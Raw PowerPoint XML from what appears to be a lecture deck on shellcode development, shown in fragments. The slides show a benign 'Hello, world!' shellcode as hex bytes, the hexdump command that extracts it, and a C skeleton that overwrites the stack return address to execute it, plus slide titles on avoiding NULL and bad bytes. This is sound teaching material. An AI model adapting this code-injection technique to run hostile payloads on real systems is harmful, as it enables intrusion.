              <a:t>void main(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109834946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49"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a: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0999"/>
            <a:ext cx="6819900" cy="573088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>helloworld1 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1628838"/>
            <a:ext cx="7859216" cy="1074653"/>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600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xe8\x0f\x00\x00\x00\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a\x0d\x59\xb8\x04\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x0f\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2996952"/>
            <a:ext cx="7571184" cy="1428596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained by running the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v -e '"\\""x" 1/1 "%02x" ""' ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>helloworld1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4724400"/>
            <a:ext cx="5410200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I’ll provide you with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dumpsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>if you like</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17925751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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>skeleton.c</a:t>
            </a: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err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3413755"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] = "\xe8\x0f\x00\x00\x00\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a\x0d\x59\xb8\x04\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x0f\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void main(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5229200"/>
            <a:ext cx="7571184" cy="1659429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We run the following commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-o ./skeleton ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>skeleton.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./skeleton </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175588614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smtClean="0"/>
              <a:t>NULL bytes and other bad bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3013646"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ndisasm</a:t>
            </a:r>
            <a:r>
